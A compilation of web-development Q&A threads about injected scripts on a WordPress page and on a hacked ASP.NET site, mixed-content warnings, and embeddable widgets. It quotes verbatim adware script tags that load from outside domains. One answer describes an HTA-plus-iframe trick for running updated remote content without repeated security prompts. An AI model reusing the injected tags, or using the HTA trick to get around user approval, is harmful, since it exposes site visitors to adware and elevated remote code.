I use Wirdoress. Today when I open the pages content I see that it contains <div id="__tbSetup"> </div>
From where this code come from. Also some of the pages contain
<p>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><br />
<br />
<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={4DCEEE00-436F-4341-AA82-349B2C73F9D8}&d=2013-5-4&s=http://mydomain.com/wp-admin/post-new.php?post_type=page"></script></p>
<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={4DCEEE00-436F-4341-AA82-349B2C73F9D8}&d=2013-5-4&s=http://mydomain.com/wp-admin/post-new.php?post_type=page"></script></p>
The above script is a functionality of an adware, which appends the above URL
(secure-content-delivery.com/something/URL-you-are-on-right-now, which in this case is a new post page or wordpress)
to every post you make, or automatically to all the places. One of the things that is known to cause this is the Text Enhance extension, which is also a known adware.
The most possible causes of this is, whether your computer is infected, and when you have logged in to your wordpress, it also infected your wordpress setup. Or the hosting provider you've chosen is infected. Please remove all the instances, and have a security checkup of your system, and your hosting provider as well. Or better change the hosting plan if you're using a shared one.
Those scripts are not added in a default install of WordPress. Disable your plugins one by one, refreshing the page and viewing the source each time until the scripts go away. When they do, the last plugin you disabled is the culprit.
Related
I am building a website using asp .net. The site uses a Google font this is imported in the masterpage like so...
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Yanone+Kaffeesatz:400,300,200" media="screen"/>
Note that I have removed the http(s) from the url.
However I still always get the following error in a popup...
"This page is accessing information that is not under its control. This poses a security risk. Do you want to continue?"
I thought that removing the http(s) would ensure that this error would not appear? How do I go about removing it?
I have also tried putting this reference in my css files using an import but I still get the popup.
I don't want to change browser settings as clients can't be expected to do this.
Thank you
I don't know if the solution below is compliant with Google API's Terms of Service.
The error you have is due to a Cross-Domain request (the popup is known as the Cross-Domain Data Access dialog).
To avoid this dialog, you can host the .css file & the related font files on the same domain has your website.
I am developing a slider. The client ( a non-technical person ) wants a slider which he can use and distribute to people easily and other people non technical people can easily install it on their websites. I am ready with the slider but I am coming across a problem that where should I host all the core .css and .js files? If I try to host them on my clients hosting, how would the non-technical persons be able to use it without editing their html code?
I am looking for a solution in which the client just pastes a code into the website and the slider starts to work ( As he has been using widgets). Please help out. Thanks.
If you have the bandwidth, host them on your server.
Instead of having separate HTML and JS files, create all your HTML via JS (ie. document.write(...)), then your client only has to paste a script tag like this:
<script type="text/javascript" src="http://yourdomain.com/widgets/slider.js"></script> <!-- Slider -->
In our app (https://apps.facebook.com/testedenivel), we explicitly reference the page css in a https link like this:
<link rel="stylesheet" href="https://d2asm4nez8zghw.cloudfront.net/content/app-teste-de-nivel.css?v=0.96.02" type="text/css" media="screen">
But strangely, Facebook is preloading this this css file as a HTTP link. At some point before, we used this HTTP url but later we changed it to HTTPS, and now it seems that Facebook is using a former, cached version of that url:
<script type="text/javascript">
new Image().src = "http:\/\/www.talkfast.com.br\/content\/app-teste-de-nivel.css";
</script>
The problem is that when the user enters our app via secure browsing, the HTTP link preloading is causing the browser to alert our users that some insecure content is about to be loaded. We'd like to know how to tell Facebook to remove this preloading script, or at least to use our current HTTPS url, like this:
<script type="text/javascript">
new Image().src = "https://d2asm4nez8zghw.cloudfront.net/content/app-teste-de-nivel.css?v=0.96.02";
</script>
There seems to be scarcity of reference regarding this issue on the web, so any help would be appreciated.
I'm not test this solution in facebook app but on wild web you can use this
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script>
as proof :)
http://paulirish.com/2010/the-protocol-relative-url/
With this all resources loaded with page protocol, so user don't see confirmation about unsecured elements on page.
Just create test app with Heroku and my chromium not angry about https resouces inside frame so problems depends on browser.
I tried using an HTA to deploy some files to the users computer. I would like to do so silently cause our users get upset by the fact that they need to approve the activation of the HTA every time the enter the page.
Can i somehow disable the apearance of the message?
TIA,
Arik
Hmmm...the message is, IIRC, a security warning, is that correct?
Adding your site to the Trusted Zone might help you (this is a client-side browser (MSIE) setting).
Unless the HTA file is residing on the user's computer, you'll just have to live with the security warning.
I, for one, certainly wouldn't want a web page running with such elevated security settings without my approval! This is just the sort of thing virus writers would want.
A novel solution, is you can deploy once a HTA application which can be an empty page with an IFRAME, i.e.
<html>
<head>
<title>Test</title>
</head>
<body>
<br/>
<iframe src="http://somewhere.org" />
</body>
</html>
That way, the HTA application can be rerun repeatedly without the need of repeated authorization since it's already on the computer. However, the content of the HTA can be updated by update the remote document specified in the IFRAME.
I have a security problem in my website. A script code was added into my all pages like "<script src="Ip address/viewpic.asp"></script>" . It is between </head> and <body> tag. Now Google says "this site may be hartful for your pc!" about my site. How can i secure my website? I use C# and Visual Studio 2008.
You have been hacked. This code that has been added to your site is trying to hack web browsers that visit your site.
This could have happened a number of ways. The easist thing for you to do is to download an anti-virus like AVG and scan any machines with access to the site. There is malware that looks for FTP connections, it grabs the username/password then logs in and modifies files it finds. You should be using SFTP which can be installed under windows, FTP is only used by people who don't know any better or love to get hacked, or both.
The more complex possibility is that there is a vulnerability in your site. This requires a professional (Like me) to track down and fix. Acunetix can help find flaws in your site, but this might not find the vulnerability that was used to break in.
Edit: Assuming that the script is your own and not malicious:
You should not have any code between </head> and <body> - Otherwise you have got a <script> tag as a direct child of <html> which is not allowed.
Put the <script> tag inside <body> at the correct place where you want the script to execute, to correct the structural issue but you need to provide some more information about the exact error messages you are seeing about security as I'm not aware that Google shows error messages within its search listings and I dont have Google Toolbar installed to know what that does; but I don't believe it has typos in it ;)
So please provide more information about the exact security warnings once you've fixed - and validated (with the W3C Validator) - the structure of your HTML.
Edit: If the script is not intended to be there and has appeared outside of your desire:
Have a look in the HTML source where the script is present; and compare to your own ASPX pages to find out where the script is appearing. If it is being rendered by one of your controls you need to examine where the value is coming from. If it is a database, you need to focus your attention on what gets the information into the DB in the first place. If the script is injected and not into one of your controls then you should talk to your ISP I would think.